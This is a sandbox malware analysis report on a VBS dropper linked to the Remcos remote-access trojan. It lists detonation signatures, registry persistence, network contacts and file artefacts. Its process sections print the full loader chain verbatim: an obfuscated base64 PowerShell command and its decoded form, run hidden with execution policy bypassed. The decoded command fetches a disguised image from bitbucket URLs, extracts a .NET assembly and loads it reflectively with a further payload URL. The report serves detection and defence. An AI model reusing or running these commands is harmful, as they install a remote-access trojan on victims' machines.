Analysis Overview
SHA256
f9af90460e2133079783fee2cd6ee5e2f56afab302146b7bd1f089b7d74a3731
Threat Level: Known bad
The file sostener.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-13 20:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-13 20:23
Reported
2024-08-13 20:23
Platform
win7-20240708-en
Max time kernel
5s
Max time network
6s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1676 wrote to memory of 2136 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1676 wrote to memory of 2136 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1676 wrote to memory of 2136 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2136 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2136 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2136 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBi#Gk#d#Bi#HU#YwBr#GU#d##u#G8#cgBn#C8#a#Bn#GQ#ZgBo#GQ#ZgBn#GQ#LwB0#GU#cwB0#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#D8#MQ#0#DQ#N##x#Dc#Mg#z#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#D0#I#BE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQBG#HI#bwBt#Ew#aQBu#Gs#cw#g#CQ#b#Bp#G4#awBz#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##t#G4#ZQ#g#CQ#bgB1#Gw#b##p#C##ew#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#I##k#GU#bgBk#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#p#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#GU#bgBk#EY#b#Bh#Gc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQBn#HQ#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#KQ#g#Hs#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##r#D0#I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C4#T#Bl#G4#ZwB0#Gg#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#C##PQ#g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQ#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#L##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##p#Ds#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#p#Ds#I##k#HQ#eQBw#GU#I##9#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#LgBH#GU#d#BU#Hk#c#Bl#Cg#JwB0#GU#cwB0#H##bwB3#GU#cgBz#Gg#ZQBs#Gw#LgBI#G8#bQBl#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#G0#ZQB0#Gg#bwBk#C##PQ#g#CQ#d#B5#H##ZQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBs#GE#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I##o#Cc#d#B4#HQ#LgBw#G4#dQBS#C8#S#BT#C8#egBy#GE#TQ#v#Gc#ZQBS#C8#awBh#FQ#Lw#5#DY#MQ#u#DM#Mw#y#C4#Mg#w#DI#Lg#x#Dk#Lw#v#Do#c#B0#HQ#a##n#Cw#I##n#DI#Jw#s#C##JwB3#GU#cgB0#Hk#Z#B0#GY#eQBm#EY#WQBH#FY#dgB1#Hk#QgBJ#Eg#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#DE#Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?11811735', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pnuR/HS/zraM/geR/kaT/961.332.202.19//:ptth', '2', 'wertydtfyfFYGVvuyBIH', 'RegAsm', '1'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
Files
memory/2136-4-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp
memory/2136-6-0x00000000023A0000-0x00000000023A8000-memory.dmp
memory/2136-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2136-7-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2136-10-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2136-9-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2136-8-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
memory/2136-11-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZUMTNAGM0XKZPQ1A696.temp
| MD5 | 3a8b47f74a5e168c295e35f86ebf5126 |
| SHA1 | ec910d5cc09b9028f674fc6f837798edb952f221 |
| SHA256 | b262ed8b7312c1864f135763e7e2eb8907bd66b0bc2b461941e8634335725b79 |
| SHA512 | 7d5a7234f1b2690966b36b6e486be315beb00aedcea0eb5c61ef0dcc2fbe031a68877042b16f469bfc52b5b11cba3a502391b5300e9604e29f234e03255e29a0 |
memory/2136-17-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-13 20:23
Reported
2024-08-13 20:25
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MyApp = "C:\\ProgramData\\wertydtfyfFYGVvuyBIH.vbs" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4200 set thread context of 3128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBi#Gk#d#Bi#HU#YwBr#GU#d##u#G8#cgBn#C8#a#Bn#GQ#ZgBo#GQ#ZgBn#GQ#LwB0#GU#cwB0#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#D8#MQ#0#DQ#N##x#Dc#Mg#z#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#D0#I#BE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQBG#HI#bwBt#Ew#aQBu#Gs#cw#g#CQ#b#Bp#G4#awBz#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##t#G4#ZQ#g#CQ#bgB1#Gw#b##p#C##ew#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#I##k#GU#bgBk#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#p#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#GU#bgBk#EY#b#Bh#Gc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQBn#HQ#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#KQ#g#Hs#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##r#D0#I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C4#T#Bl#G4#ZwB0#Gg#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#C##PQ#g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQ#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#L##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##p#Ds#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#p#Ds#I##k#HQ#eQBw#GU#I##9#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#LgBH#GU#d#BU#Hk#c#Bl#Cg#JwB0#GU#cwB0#H##bwB3#GU#cgBz#Gg#ZQBs#Gw#LgBI#G8#bQBl#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#G0#ZQB0#Gg#bwBk#C##PQ#g#CQ#d#B5#H##ZQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBs#GE#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I##o#Cc#d#B4#HQ#LgBw#G4#dQBS#C8#S#BT#C8#egBy#GE#TQ#v#Gc#ZQBS#C8#awBh#FQ#Lw#5#DY#MQ#u#DM#Mw#y#C4#Mg#w#DI#Lg#x#Dk#Lw#v#Do#c#B0#HQ#a##n#Cw#I##n#DI#Jw#s#C##JwB3#GU#cgB0#Hk#Z#B0#GY#eQBm#EY#WQBH#FY#dgB1#Hk#QgBJ#Eg#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#DE#Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?11811735', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; 